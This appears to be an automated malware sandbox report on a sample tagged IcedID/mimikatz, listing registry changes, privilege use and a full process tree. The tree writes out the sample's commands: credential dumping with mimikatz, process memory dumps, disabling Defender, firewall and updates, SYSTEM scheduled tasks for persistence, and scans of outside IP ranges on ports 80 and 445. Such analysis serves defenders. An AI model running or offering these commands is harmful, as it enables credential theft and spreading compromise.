\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ vkdejee.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" vkdejee.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" vkdejee.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3184 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 2420 2024-05-07_a7edbd9f48301c943397047f776348ca_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2420 2024-05-07_a7edbd9f48301c943397047f776348ca_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 3792 vkdejee.exe Token: SeDebugPrivilege 4692 vkdejee.exe Token: SeDebugPrivilege 1404 vfshost.exe Token: SeDebugPrivilege 1392 ibibzztte.exe Token: SeLockMemoryPrivilege 3544 fpibei.exe Token: SeLockMemoryPrivilege 3544 fpibei.exe Token: SeDebugPrivilege 4500 ibibzztte.exe Token: SeDebugPrivilege 4656 ibibzztte.exe Token: SeDebugPrivilege 4400 ibibzztte.exe Token: SeDebugPrivilege 1452 ibibzztte.exe Token: SeDebugPrivilege 5076 ibibzztte.exe Token: SeDebugPrivilege 4460 ibibzztte.exe Token: SeDebugPrivilege 452 ibibzztte.exe Token: SeDebugPrivilege 2220 ibibzztte.exe Token: SeDebugPrivilege 1404 ibibzztte.exe Token: SeDebugPrivilege 2320 ibibzztte.exe Token: SeDebugPrivilege 4772 ibibzztte.exe Token: SeDebugPrivilege 2288 ibibzztte.exe Token: SeDebugPrivilege 2640 ibibzztte.exe Token: SeDebugPrivilege 4468 ibibzztte.exe Token: SeDebugPrivilege 4140 ibibzztte.exe Token: SeDebugPrivilege 452 ibibzztte.exe Token: SeDebugPrivilege 3952 ibibzztte.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 2420 2024-05-07_a7edbd9f48301c943397047f776348ca_hacktools_icedid_mimikatz.exe 2420 2024-05-07_a7edbd9f48301c943397047f776348ca_hacktools_icedid_mimikatz.exe 3792 vkdejee.exe 3792 vkdejee.exe 4692 vkdejee.exe 4692 vkdejee.exe 1184 xohudmc.exe 1360 fkjvgk.exe 2796 vkdejee.exe 2796 vkdejee.exe 5504 vkdejee.exe 5504 vkdejee.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2420 wrote to memory of 1444 2420 2024-05-07_a7edbd9f48301c943397047f776348ca_hacktools_icedid_mimikatz.exe 83 PID 2420 wrote to memory of 1444 2420 2024-05-07_a7edbd9f48301c943397047f776348ca_hacktools_icedid_mimikatz.exe 83 PID 2420 wrote to memory of 1444 2420 2024-05-07_a7edbd9f48301c943397047f776348ca_hacktools_icedid_mimikatz.exe 83 PID 1444 wrote to memory of 3184 1444 cmd.exe 85 PID 1444 wrote to memory of 3184 1444 cmd.exe 85 PID 1444 wrote to memory of 3184 1444 cmd.exe 85 PID 1444 wrote to memory of 3792 1444 cmd.exe 93 PID 1444 wrote to memory of 3792 1444 cmd.exe 93 PID 1444 wrote to memory of 3792 1444 cmd.exe 93 PID 4692 wrote to memory of 3868 4692 vkdejee.exe 95 PID 4692 wrote to memory of 3868 4692 vkdejee.exe 95 PID 4692 wrote to memory of 3868 4692 vkdejee.exe 95 PID 3868 wrote to memory of 1688 3868 cmd.exe 97 PID 3868 wrote to memory of 1688 3868 cmd.exe 97 PID 3868 wrote to memory of 1688 3868 cmd.exe 97 PID 3868 wrote to memory of 5116 3868 cmd.exe 98 PID 3868 wrote to memory of 5116 3868 cmd.exe 98 PID 3868 wrote to memory of 5116 3868 cmd.exe 98 PID 3868 wrote to memory of 2344 3868 cmd.exe 99 PID 3868 wrote to memory of 2344 3868 cmd.exe 99 PID 3868 wrote to memory of 2344 3868 cmd.exe 99 PID 3868 wrote to memory of 2076 3868 cmd.exe 100 PID 3868 wrote to memory of 2076 3868 cmd.exe 100 PID 3868 wrote to memory of 2076 3868 cmd.exe 100 PID 3868 wrote to memory of 460 3868 cmd.exe 101 PID 3868 wrote to memory of 460 3868 cmd.exe 101 PID 3868 wrote to memory of 460 3868 cmd.exe 101 PID 3868 wrote to memory of 3308 3868 cmd.exe 102 PID 3868 wrote to memory of 3308 3868 cmd.exe 102 PID 3868 wrote to memory of 3308 3868 cmd.exe 102 PID 4692 wrote to memory of 2840 4692 vkdejee.exe 103 PID 4692 wrote to memory of 2840 4692 vkdejee.exe 103 PID 4692 wrote to memory of 2840 4692 vkdejee.exe 103 PID 4692 wrote to memory of 1972 4692 vkdejee.exe 105 PID 4692 wrote to memory of 1972 4692 vkdejee.exe 105 PID 4692 wrote to memory of 1972 4692 vkdejee.exe 105 PID 4692 wrote to memory of 3096 4692 vkdejee.exe 107 PID 4692 wrote to memory of 3096 4692 vkdejee.exe 107 PID 4692 wrote to memory of 3096 4692 vkdejee.exe 107 PID 4692 wrote to memory of 3228 4692 vkdejee.exe 112 PID 4692 wrote to memory of 3228 4692 vkdejee.exe 112 PID 4692 wrote to memory of 3228 4692 vkdejee.exe 112 PID 3228 wrote to memory of 3376 3228 cmd.exe 114 PID 3228 wrote to memory of 3376 3228 cmd.exe 114 PID 3228 wrote to memory of 3376 3228 cmd.exe 114 PID 3376 wrote to memory of 5052 3376 wpcap.exe 115 PID 3376 wrote to memory of 5052 3376 wpcap.exe 115 PID 3376 wrote to memory of 5052 3376 wpcap.exe 115 PID 5052 wrote to memory of 1284 5052 net.exe 117 PID 5052 wrote to memory of 1284 5052 net.exe 117 PID 5052 wrote to memory of 1284 5052 net.exe 117 PID 3376 wrote to memory of 1228 3376 wpcap.exe 118 PID 3376 wrote to memory of 1228 3376 wpcap.exe 118 PID 3376 wrote to memory of 1228 3376 wpcap.exe 118 PID 1228 wrote to memory of 388 1228 net.exe 120 PID 1228 wrote to memory of 388 1228 net.exe 120 PID 1228 wrote to memory of 388 1228 net.exe 120 PID 3376 wrote to memory of 3056 3376 wpcap.exe 121 PID 3376 wrote to memory of 3056 3376 wpcap.exe 121 PID 3376 wrote to memory of 3056 3376 wpcap.exe 121 PID 3056 wrote to memory of 1008 3056 net.exe 123 PID 3056 wrote to memory of 1008 3056 net.exe 123 PID 3056 wrote to memory of 1008 3056 net.exe 123 PID 3376 wrote to memory of 2952 3376 wpcap.exe 124
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1468
-
C:\Windows\TEMP\rttutifin\fpibei.exe"C:\Windows\TEMP\rttutifin\fpibei.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3544
-
-
C:\Users\Admin\AppData\Local\Temp\2024-05-07_a7edbd9f48301c943397047f776348ca_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-05-07_a7edbd9f48301c943397047f776348ca_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2420 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\gibpmken\vkdejee.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:3184
-
-
C:\Windows\gibpmken\vkdejee.exeC:\Windows\gibpmken\vkdejee.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3792
-
-
-
C:\Windows\gibpmken\vkdejee.exeC:\Windows\gibpmken\vkdejee.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4692 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:3868 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1688
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:5116
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2344
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:2076
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:460
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:3308
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵PID:2840
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵PID:1972
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵PID:3096
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\umubtmbps\bbrcgicuu\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:3228 -
C:\Windows\umubtmbps\bbrcgicuu\wpcap.exeC:\Windows\umubtmbps\bbrcgicuu\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3376 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:5052 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:1284
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:1228 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:388
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:1008
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:2952
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:4732
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:4616
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:3616
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:536
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:3452
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:4248
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:3276
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\umubtmbps\bbrcgicuu\pivnitiek.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\umubtmbps\bbrcgicuu\Scant.txt2⤵PID:2076
-
C:\Windows\umubtmbps\bbrcgicuu\pivnitiek.exeC:\Windows\umubtmbps\bbrcgicuu\pivnitiek.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\umubtmbps\bbrcgicuu\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:864
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\umubtmbps\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\umubtmbps\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:4968 -
C:\Windows\umubtmbps\Corporate\vfshost.exeC:\Windows\umubtmbps\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1404
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ilejsubhf" /ru system /tr "cmd /c C:\Windows\ime\vkdejee.exe"2⤵PID:3692
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1300
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ilejsubhf" /ru system /tr "cmd /c C:\Windows\ime\vkdejee.exe"3⤵
- Creates scheduled task(s)
PID:636
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "uidenmpcg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\gibpmken\vkdejee.exe /p everyone:F"2⤵PID:3740
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2256
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "uidenmpcg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\gibpmken\vkdejee.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:3560
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "nztfembbk" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\rttutifin\fpibei.exe /p everyone:F"2⤵PID:3956
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3596
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "nztfembbk" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\rttutifin\fpibei.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:4920
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵PID:4060
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵PID:2088
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:4688
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:2708
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵PID:1124
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵PID:1576
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:3572
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:2752
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵PID:1296
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵PID:3132
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:4652
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:3700
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵PID:2324
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵PID:4268
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵PID:408
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵PID:2964
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
PID:964
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵PID:1452
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
PID:4408
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵PID:3148
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵PID:4440
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵PID:1348
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵PID:2104
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵PID:4968
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:1228
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵PID:3804
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵PID:5052
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵PID:4052
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵PID:5092
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
PID:4704
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵PID:448
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
PID:1564
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵PID:4140
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:2088
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵PID:4020
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
PID:2640
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:1184
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 780 C:\Windows\TEMP\umubtmbps\780.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1392
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 316 C:\Windows\TEMP\umubtmbps\316.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4500
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 1468 C:\Windows\TEMP\umubtmbps\1468.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4656
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 2556 C:\Windows\TEMP\umubtmbps\2556.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4400
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 2936 C:\Windows\TEMP\umubtmbps\2936.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1452
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 3024 C:\Windows\TEMP\umubtmbps\3024.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5076
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 2684 C:\Windows\TEMP\umubtmbps\2684.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4460
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 3844 C:\Windows\TEMP\umubtmbps\3844.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:452
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 3936 C:\Windows\TEMP\umubtmbps\3936.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2220
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 4004 C:\Windows\TEMP\umubtmbps\4004.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1404
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 3420 C:\Windows\TEMP\umubtmbps\3420.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2320
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 2120 C:\Windows\TEMP\umubtmbps\2120.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4772
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 1892 C:\Windows\TEMP\umubtmbps\1892.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2288
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 3680 C:\Windows\TEMP\umubtmbps\3680.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2640
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 4040 C:\Windows\TEMP\umubtmbps\4040.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4468
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 4668 C:\Windows\TEMP\umubtmbps\4668.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4140
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 772 C:\Windows\TEMP\umubtmbps\772.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:452
-
-
C:\Windows\TEMP\umubtmbps\ibibzztte.exeC:\Windows\TEMP\umubtmbps\ibibzztte.exe -accepteula -mp 3744 C:\Windows\TEMP\umubtmbps\3744.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3952
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\umubtmbps\bbrcgicuu\scan.bat2⤵PID:3456
-
C:\Windows\umubtmbps\bbrcgicuu\fuinnkdmr.exefuinnkdmr.exe TCP 191.101.0.1 191.101.255.255 445 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:1568
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵PID:2660
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3208
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:5572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2764
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:452
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2852
-
-
